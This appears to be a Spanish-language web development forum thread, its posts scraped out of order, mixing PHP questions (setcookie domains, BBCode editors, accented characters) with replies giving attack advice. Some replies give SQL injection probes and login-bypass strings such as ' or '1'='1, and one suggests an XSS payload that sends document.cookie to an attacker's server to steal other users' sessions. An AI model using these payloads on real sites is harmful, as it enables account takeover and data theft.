20 años todavia
....mmm los t´s..

Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes

SAludos

Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link

Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos

Muchas gracias

Hola de nuevo, tengo una duda, en mi página quiero poner para mi comodidad y de los que agreguen noticias además para hacerlo seguro poner un editor de texto como el de los foros, como el que estoy usando en este momento, con lenguaje bbcode o parecido,  mas o menos tengo una idea de como hacerlo pero creo que es muy complicado para hacerlo por el momento y me gustaría saber si existe algun tipo de proyecto open source o parecido que tenga el código ya hecho y que se pueda adaptar a mi página ya que he visto páginas que no son blogs ni nada por el estilo que tienen editores así.

Saludos

No importa cual dominio le pnga, ni si el servidor donde lo pruebo es local o el que tengo, de todas maneras no acepta ese parametro, quiza sea una restriccion del navegador para que no te metas cookies de otro sitio o del mismo php
Saludos

HOla que tal, estoy teniendo un problema con la funcion setcookie() en php solo em funciona si no pogo dominio, es decir si lo pongo asi:
setcookie($nombre,$valor,$tiempo_vida,$path);
funciona perfectamente y le asigna solo el dominio(el de mi servidor) pero a la hora de poner un dominio cualquiera: setcookie($nombre,$valor,$tiempo_vida,$path,$dominioX); no funciona

Por que puede ser, habra forma de resolverlo

Saludos

otra pequeña pregunta, ayer puse una pregunta sobre como saber la carpeta base de un pagina referente, pero em lo borraron, no creo haber fallado de ninguna forma en las reglas del foro, por que pudo haber sido?

en el lgin deberias poner
' or '1'='1
lo que dices que pusiste es incorrecto:
imagina la cadena sql:
SELECT * FROM ususario WHERE user='' or '1'='1' AND....
nota como la cadena es valida todos lso comillas se cierran correctamente en cambio con lo que tu envias no:
SELECT * FROM ususario WHERE user='''or '1'=' ' AND....

tambien pruedes probar el ya clasico
' or 1=1--
SELECT * FROM ususario WHERE user=''or 1=1 -- ' AND (todo esto se vuelve comentario)....

Si efectivamente como dice si lance son muchos caracteres los que hya que remplazar pero ya lo logre sin tener que ahcer eso solo puse en la cabezera el sigueitne codigo:


Saludos

Hola que tal, siento el titulo no se me ocurrio como expresar la idea, este es el problema, quizá ya mcuhos han tenido el problema de que al poner n caracter como á ñ é y muchos caracteres por alguna razón el exploradro de internet no los lee y pone en vez de eso un signo de interrogación, para evitar esto claro se pone con su "entidad" o entity por ejemplo para el apostrife sería     ', el problema es que tengo una base de datos de noticias en las que seria muy complicado estar cambiado cada valor por su representación de esta forma, claro usaría una funcion para hacerlo que para mi no seria lo ideal, lo que quiero saber es si existe una función en php que haga esto por mí o alguna forma de que logre que le explorador reconozca este tipo de caracteres

Saludos!